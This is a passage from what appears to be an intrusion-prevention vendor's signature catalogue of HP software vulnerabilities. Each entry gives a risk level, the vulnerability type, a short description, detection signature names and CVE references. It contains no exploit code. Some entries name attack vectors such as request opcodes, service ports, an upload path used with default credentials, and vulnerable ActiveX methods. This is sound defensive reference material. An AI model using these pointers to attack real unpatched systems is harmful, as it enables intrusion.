Description: A code execution vulnerability exists in HP OpenView Performance Insight server.
Situation: HTTP_CSH-HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution
References:
CVE-2011-0276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276
BID-46079
http://www.securityfocus.com/bid/46079
OSVDB-70754
http://www.osvdb.org/70754
Back to top

HP-OpenView-Storage-Data-Protector-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Storage Data Protector 5.5 and 6.0
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView Application Recovery Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability in HP OpenView Storage Data Protector 5.5 and 6.0 which allows attackers to remotly execute arbitrary code via an long MSG_PROTOCOL command with long arguments.
Situation: Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow
References:
CVE-2007-2280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2280
BID-37396
http://www.securityfocus.com/bid/37396
OSVDB-61206
http://www.osvdb.org/61206
Back to top

HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in HP OpenView Data Protector Cell Manager
Risk: High
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Data Protector Application Recovery Manager
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in HP OpenView Data Protector Cell Manager. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the affected service to execute arbitrary code with the privileges of the service, which is usually SYSTEM.
Situation: Generic_CS-HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow
References:
CVE-2007-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2281
BID-37386
http://www.securityfocus.com/bid/37386
OSVDB-61205
http://www.osvdb.org/61205
Back to top

HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in HP OpenView Storage Data Protector detected
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView Storage Data Protector
Type: Malfunction
Description: A buffer overflow vulnerability exists in HP OpenView Storage Data Protector. The vulnerability is due to improper bounds checking while parsing EXEC_CMD requests sent to the vulnerable service. A remote attacker could exploit this by sending a malicious packets to the target.
Situation: Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow-2
References:
CVE-2011-1866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866
BID-48488
http://www.securityfocus.com/bid/48488
OSVDB-73572
http://www.osvdb.org/73572
Back to top

HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in HP OpenView Data Protector
Risk: High
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Data Protector Application Recovery Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Data Protector. A remote unauthenticated attacker can exploit this vulnerability by sending a 0x010b request to a target server to execute arbitrary code with the privileges of the service.
Situation: Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow
Back to top

HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2

About this vulnerability: An attempt to exploit vulnerability in HP OpenView Storage Data Protector detected
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView Storage Data Protector
Type: Malfunction
Description: A stack buffer overflow vulnerability exists in HP OpenView Storage Data Protector. The vulnerability is due to improper parsing of opcode 27 requests sent to the vulnerable service.
Situation: Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-3
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-4
References:
CVE-2011-1865
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865
BID-48486
http://www.securityfocus.com/bid/48486
OSVDB-73571
http://www.osvdb.org/73571
Back to top

HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Operations Agent for NonStop Server
Risk: High
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Operations Agent
Type: Input Validation
Description: A buffer overflow vulnerability has been discovered in HP Operations Agent for NonStop Server. The vulnerability is due to an insufficient boundary check prior to copying user-supplied data into a stack buffer when handling the HEALTH packet type. An attacker can exploit this vulnerability by sending a malicious request message to the vulnerable service on port 7771/TCP or 8976/TCP. Successful exploitation of the vulnerability would lead to code execution in the security context of the affected service, which is SYSTEM. If the attack fails, the application may terminate abnormally.
Situation: Generic_CS-HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow
References:
OSVDB-84854
http://www.osvdb.org/84854
Back to top

HP-Operations-Agent-Performance-Component-Last-Chunk-Buffer-Overflow

About this vulnerability: A vulnerability in HP Operations Agent
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: HP Operations Agent
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in HP Operations Agent. When handling a length-encoded chunk in a request received over the network, the vulnerable code copies user-supplied data into a fixed-length stack buffer without boundary check. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with System privileges on Windows platforms.
Situation: HTTP_CS-HP-Operations-Agent-Opcode-0x34-Stack-Buffer-Overflow
References:
CVE-2012-2019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2019
OSVDB-83673
http://www.osvdb.org/83673
Back to top

HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Performance Agent
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Operations Agent
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in HP Operations Agent. When handling requests with various opcodes, the vulnerable code uses a user-supplied value as the length for a copy operation whose destination is a fixed length stack buffer. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system.
Situation: Generic_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
HTTP_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
References:
CVE-2012-2020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2020
OSVDB-83674
http://www.osvdb.org/83674
Back to top

HP-Operations-Manager-Server-Unauthorized-File-Upload

About this vulnerability: A vulnerability in HP Operations Manager for Windows
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: HP Operations Manager for Windows
Type: Malfunction
Description: An unauthorized file upload vulnerability exists in HP Operations Manager. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to /manager/html/upload using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. In this case, the injected code will run with the privileges of SYSTEM.
Situation: HTTP_CSH-HP-Operations-Manager-Server-Unauthorized-File-Upload
References:
CVE-2009-3843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843
BID-37086
http://www.securityfocus.com/bid/37086
OSVDB-60317
http://www.osvdb.org/60317
Back to top

HP-Photo-Creative-Audio-Record-ActiveX-BOF

About this vulnerability: A vulnerability in HP Photo Creative
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Photo Creative
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP Photo Creative ActiveX control. The vulnerability is due to a boundary error in ContentMan.dll while parsing arguments passed to the Resample function of the audio.Record ActiveX control. Remote attackers could exploit this vulnerability by enticing the target users to visit a specially crafted web page. Successful exploitation would result in arbitrary code execution with the privileges of the logged in user.
Situation: File-Text_HP-Photo-Creative-Audio-ActiveX-BOF
Back to top

HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Open-Method-Buffer-Overflow

About this vulnerability: A vulnerability in HP OLE Point of Sale (OPOS) Driver
Risk: Moderate
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OPOS Driver
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the OPOSPOSKeyboard.ocx component of HP Point of Sale PC running with OPOS Driver. The vulnerability is due to insufficient input validation on user controlled data to the Open method. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a malicious file or visit a malicious page. Successful exploitation could lead to code execution under the security context of the browser process.
Situation: File-Text_HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Buffer-Overflow2
References:
CVE-2014-7891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7891
OSVDB-119192
http://www.osvdb.org/119192
Back to top

HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP OLE Point of Sale (OPOS) Driver
Risk: Moderate
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OPOS Driver
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the opostoneindicator.ocx component of HP Point of Sale PC running with OPOS Driver. The vulnerability is due to insufficient input validation on user supplied parameter value to the Open method. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a malicious file or visit a malicious page. Successful exploitation could lead to code execution under the security context of the currently logged on user.
Situation: File-Text_HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow
References:
CVE-2014-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7890
OSVDB-119191
http://www.osvdb.org/119191
Back to top

HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Power Manager
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Power Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Power Manager. This vulnerability may be exploited by remote unauthenticated attackers to cause execution of arbitrary code on the target system in the context of the affected service.
Situation: HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow
References:
CVE-2010-4113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4113
Back to top

HP-Power-Manager-Form-Export-Logs-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP Power Manager
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Power Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP Power Manager. The vulnerability is due to insufficient bounds checking while processing URL parameters in the formExportDataLogs form of the web based management web server. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the target system in the context of the SYSTEM user by sending malicious HTTP requests.
Situation: HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Buffer-Overflow
References:
CVE-2009-3999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3999
BID-37866
http://www.securityfocus.com/bid/37866
Back to top

HP-Power-Manager-Form-Export-Logs-Directory-Traversal

About this vulnerability: A directory traversal vulnerability in HP Power Manager
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Power Manager
Type: Input Validation
Description: There is a directory traversal vulnerability in HP Power Manager. A remote unauthenticated attacker can exploit this vulnerability to overwrite arbitrary files with attacker-controlled data on the target system by sending malicious HTTP requests, possibly leading to execution of arbitrary code within the SYSTEM security context.
Situation: HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Directory-Traversal
References:
CVE-2009-4000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4000
BID-37873
http://www.securityfocus.com/bid/37873
OSVDB-61849
http://www.osvdb.org/61849
Back to top

HP-Power-Manager-Login-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP Power Manager
Risk: High
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: HP Power Manager
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in HP Power Manager. The vulnerability is due to insufficient bounds checking in the HP Power Manager when processing URL parameters in the login form of the web-based management web server. Remote unauthenticated attackers can exploit this vulnerability by sending malicious HTTP requests to the target. Successful exploitation can result in the execution of arbitrary code in the security context of the service, normally SYSTEM.
Situation: HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow
References:
CVE-2009-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2685
BID-36933
http://www.securityfocus.com/bid/36933
OSVDB-59684
http://www.osvdb.org/59684
Back to top

HP-Procurve-Manager-Snac-File-Upload

About this vulnerability: An HP Procurve Manager Snac File Upload vulnerability
Risk: High
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP ProCurve Manager
Type: Misconfiguration
Description: A vulnerability in HP ProCurve Manager, vesion 4.0, in UpdateCertificatesServlet, which allows remote attackers to upload .jsp files, and possibly excute remote code.
Situation: HTTP_CS-HP-Procurve-Manager-Snac-File-Upload
References:
CVE-2013-4812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812
BID-62348
http://www.securityfocus.com/bid/62348
OSVDB-97155
http://www.osvdb.org/97155
Back to top

HP-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass

About this vulnerability: A vulnerability in HP Identity Driven Manager
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Identity Driven Manager; HP ProCurve Manager; HP ProCurve Manager Plus
Type: Malfunction
Description: There is a policy bypass vulnerability in HP ProCurve Manager SNAC. The vulnerability is due to a design weakness in the GetDomainControllerServlet class. A remote attacker could exploit the vulnerability by sending specially crafted data to a vulnerable version of the software. Successful exploitation could result in authentication bypass.
Situation: HTTP_CSU-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass
Back to top

HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution

About this vulnerability: A vulnerability in HP Identity Driven Manager
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Identity Driven Manager; HP ProCurve Manager; HP ProCurve Manager Plus
Type: Directory Traversal
Description: A vulnerability has been reported in HP ProCurve Manager SNAC. The vulnerability is due to directory traversal in the UpdateDomainControllerServlet class. A remote attacker could exploit the vulnerability by sending specially crafted data to a vulnerable version of the software. Successful exploitation could result in code execution under the context of SYSTEM.
Situation: HTTP_CS-HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution
References:
CVE-2013-4811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4811
BID-62349
http://www.securityfocus.com/bid/62349
OSVDB-97154
http://www.osvdb.org/97154
Back to top

HP-Release-Control-Authenticated-Privilege-Escalation

About this vulnerability: A vulnerability in HP Release Control
Risk: Moderate
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Release Control
Type: Malfunction
Description: A privilege escalation vulnerability exists in HP Release Control. The vulnerability is due to a design weakness in implementing access control restrictions to the "updateUserPassword" method. A remote, authenticated but unprivileged user is able to exploit this vulnerability by sending unauthorized requests to the server. Successful exploitation will allow the attacker to set the administrator password to a string of their choosing.
Situation: HTTP_CS-HP-Release-Control-Authenticated-Privilege-Escalation
References:
BID-67461
http://www.securityfocus.com/bid/67461
OSVDB-107050
http://www.osvdb.org/107050
Back to top

HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal

About this vulnerability: A vulnerability in HP Service Virtualization
Risk: Moderate
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Service Virtualization
Type: Directory Traversal
Description: A code execution vulnerability exists in HP Service Virtualization running the AutoPass License Server. The vulnerability is due to a directory traversal flaw in UploadRequestHandler.class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. In the event of a successful attack, arbitrary files can be created on the server, leading to arbitrary code execution in the context of the SYSTEM.
Situation: HTTP_CS-HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal
References:
CVE-2013-6221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6221
OSVDB-107943
http://www.osvdb.org/107943
Back to top

HP-Sitescope-Emailservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP SiteScope
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Input Validation
Description: An information disclosure vulnerability exists in HP SiteScope. The vulnerability is due to a lack of input validation in the EmailServlet servlet when processing HTTP requests. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. In a successful attack scenario, the attacker can disclose the contents of arbitrary files on the local file system.
Situation: HTTP_CRL-HP-Sitescope-Emailservlet-Information-Disclosure
References:
CVE-2014-2614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2614
BID-68632
http://www.securityfocus.com/bid/68632
OSVDB-108709
http://www.osvdb.org/108709
Back to top

HP-Sitescope-Integrationviewer-Default-Credentials

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Malfunction
Description: A default credential vulnerability has been reported in HP SiteScope. On a fresh installation of SiteScope, the administrator account is accessible without a password and there is a user account called integrationViewer with a default password. A remote attacker can exploit these default credentials to access the SiteScope web interface. Once authenticated, the attacker can exploit additional policy-bypass and directory-traversal vulnerabilities. Through specially crafted requests, they allow the attacker to perform administrative tasks when authenticated as a non-administrative user and to read contents of arbitrary files.
Situation: HTTP_CRL-HP-Sitescope-Integrationviewer-Default-Credentials
References:
BID-49345
http://www.securityfocus.com/bid/49345
OSVDB-74865
http://www.osvdb.org/74865
Back to top

HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution

About this vulnerability: A vulnerability in HP SiteScope
Risk: High
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Malfunction
Description: A command execution vulnerability has been found in HP SiteScope. The vulnerability is due to lack of authentication when handling "issueSiebelCmd" SOAP requests. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation of these vulnerabilities can lead to arbitrary command execution.
Situation: HTTP_CS-HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution
References:
CVE-2013-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4835
OSVDB-99230
http://www.osvdb.org/99230
Back to top

HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Malfunction
Description: There is an information disclosure vulnerability in HP SiteScope. The vulnerability is due to an access control weakness resulting in the disclosure of file contents on the target system via several SOAP requests. An unauthenticated remote attacker can exploit this vulnerability by sending malicious SOAP requests to the target server to view the contents of an arbitrary file. A successful exploitation attempt could result in the disclosure of information of any file on the target system, which can be used by a future attack.
Situation: HTTP_CS-HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure
References:
OSVDB-85118
http://www.osvdb.org/85118
Back to top

HP-Sitescope-Log-Analyzer-Information-Disclosure

About this vulnerability: A vulnerability in HP SiteScope
Risk: High
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: HP SiteScope
Type: Input Validation
Description: A privilege escalation vulnerability exists in HP SiteScope. The vulnerability is due to improper validation of the log path, allowing the user to read the users.config file. A remote, authenticated attacker may exploit this vulnerability by submitting a crafted log path. Successful exploitation would allow the authenticated attacker to gain administrator role privileges.
Situation: HTTP_CS-HP-Sitescope-Log-Analyzer-Information-Disclosure
References:
CVE-2015-2120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2120
Back to top

HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Directory Traversal
Description: Two directory traversal vulnerabilities have been reported in HP SiteScope. The Vulnerabilities are due to insufficient validation of user input while processing URL parameters provided to UploadDownload manager servlets. A remote authenticated attacker can exploit these vulnerabilities by sending malicious requests to a target URL to upload and download arbitrary files. A successful exploitation attempt could lead to remote code execution under in the context of the process that executes the uploaded file, which is can be SYSTEM, depending on the uploaded file. HP has released an advisory: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03489683&amp;ac.admitted=1348238310857.876444892.199480143
Situation: HTTP_CRL-HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities
References:
BID-55273
http://www.securityfocus.com/bid/55273
OSVDB-85121
http://www.osvdb.org/85121
Back to top

HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Malfunction
Description: Two security bypass weaknesses have been reported in HP SiteScope. The vulnerabilities are due to insufficient access controls when processing SOAP requests to APIPreferenceImpl. A remote, unauthenticated attacker can exploit these vulnerabilities to create new user accounts on the server, view the SiteScope Administrator account properties such as login information and modify them if desired.
Situation: HTTP_CS-HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass
References:
BID-55269
http://www.securityfocus.com/bid/55269
Back to top

HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Malfunction
Description: Two access control weaknesses have been reported in HP SiteScope. The vulnerabilities are due to insufficient controls when sending SOAP requests to APISiteScopeImpl. A remote, unauthenticated attacker can exploit these vulnerabilities to obtain the administrator's username and password and the content of arbitrary files on the target server. HP has not released an advisory regarding this vulnerability.
Situation: HTTP_CS-HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures
References:
BID-55269
http://www.securityfocus.com/bid/55269
OSVDB-85119
http://www.osvdb.org/85119
Back to top

HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection

About this vulnerability: A vulnerability in HP SiteScope
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP SiteScope
Type: Input Validation
Description: A command injection vulnerability exists in HP SiteScope SOAP component. The vulnerability is due to insufficient validation of "omHost" key value. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary command with the SYSTEM context on the vulnerable target.
Situation: HTTP_CS-HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection
References:
CVE-2013-2367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2367
OSVDB-95824
http://www.osvdb.org/95824
Back to top

HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption

About this vulnerability: A vulnerability in HP Sprinter
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Sprinter
Type: Malfunction
Description: Multiple vulnerabilities exist in HP Sprinter. The vulnerabilities are in methods AttachToSS, CopyRange, CopyRangeEx, and SwapTables within the Tidestone Formula One ActiveX control. A remote, unauthenticated attacker could exploit this vulnerability by enticing an unsuspecting victim to follow a malicious link. A successful attack could result in the execution of arbitrary script code in the user's browser in the context of the affected site.
Situation: File-Text_HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption
References:
CVE-2014-2635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2635
Back to top

HP-Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow

About this vulnerability: A vulnerability in HP Sprinter
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Sprinter
Type: Buffer Overflow
Description: A code execution vulnerability exists in HP Sprinter. The vulnerability is due to a buffer overflow while handling the DefaultFontName property within the Tidestone Formula One ActiveX control. A remote attacker could exploit this vulnerability by enticing an unsuspecting victim to follow a malicious link. A successful attack could result in the execution of arbitrary code in the context of the affected user.
Situation: File-Text_Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow
References:
CVE-2014-2638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2638
Back to top

HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF

About this vulnerability: A vulnerability in HP StorageWorks File Migration Agent
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP StorageWorks File Migration Agent
Type: Buffer Overflow
Description: There is a stack buffer overflow in HP StorageWorks. This vulnerability is due to insufficient validation of the size of the "archive name" variable while processing CIFS archive requests within RsaCIFS.dll. A remote, unauthenticated attacker can exploit the vulnerability by sending overly long requests to File Migration Agent which listens on port TCP/9111. Exploitation may crash the application resulting in a denial of service and may also lead to arbitrary code execution.
Situation: Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF
References:
OSVDB-84102
http://www.osvdb.org/84102
Back to top

HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP StorageWorks File Migration Agent
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP StorageWorks File Migration Agent
Type: Buffer Overflow
Description: There is a stack buffer overflow in HP StorageWorks. This vulnerability is due to insufficient validation of the size of the "root path" variable while processing FTP archive requests within RsaFTP.dll. A remote, unauthenticated attacker can exploit the vulnerability by sending overly long requests to File Migration Agent which listens on port TCP/9111. Exploitation may crash the application resulting in a denial of service and may also lead to arbitrary code execution.
Situation: Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow
References:
OSVDB-84102
http://www.osvdb.org/84102
Back to top

HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution

About this vulnerability: Buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP StorageWorks Storage Mirroring
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service. The vulnerability allows a remote unauthenticated attacker to cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.
Situation: Generic_UDP-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_CS-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_CS-HP-StorageWorks-Storage-Mirroring-Buffer-Overflow-Exploit
References:
CVE-2008-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1661
OSVDB-45924
http://www.osvdb.org/45924
Back to top

HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution

About this vulnerability: An HP StorageWorks Virtual SAN Appliance Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP StorageWorks Virtual SAN Appliance
Type: Input Validation
Description: An input validation vulnerability in HP StorageWorks Virtual SAN Appliance, before version 9.5, which allows remote attackers to execute arbitrary commands via shell metacharacters in the second parameter.
Situation: Generic_CS-HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution
References:
CVE-2012-4361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4361
OSVDB-82087
http://www.osvdb.org/82087
Back to top

HP-System-Management-Homepage-Command-Injection

About this vulnerability: A vulnerability in HP System Management Homepage (SMH)
Risk: Moderate
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP System Management Homepage
Type: Input Validation
Description: There is a command-injection vulnerability in HP System Management Homepage. The vulnerability is due to a failure to sanitize variables provided by a user over the network to the ginkgosnmp.inc script. A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the affected server. Successful exploitation could result in arbitrary command execution with elevated privileges.
Situation: Generic_CS-System-Management-Homepage-Command-Injection
HTTP_CSU-System-Management-Homepage-Command-Injection
References:
CVE-2013-3576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3576
BID-60471
http://www.securityfocus.com/bid/60471
OSVDB-94191
http://www.osvdb.org/94191
Back to top

HP-System-Management-Homepage-Iprange-Parameter-Code-Execution

About this vulnerability: A vulnerability in HP System Management Homepage (SMH)
Risk: High
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: HP System Management Homepage
Type: Buffer Overflow
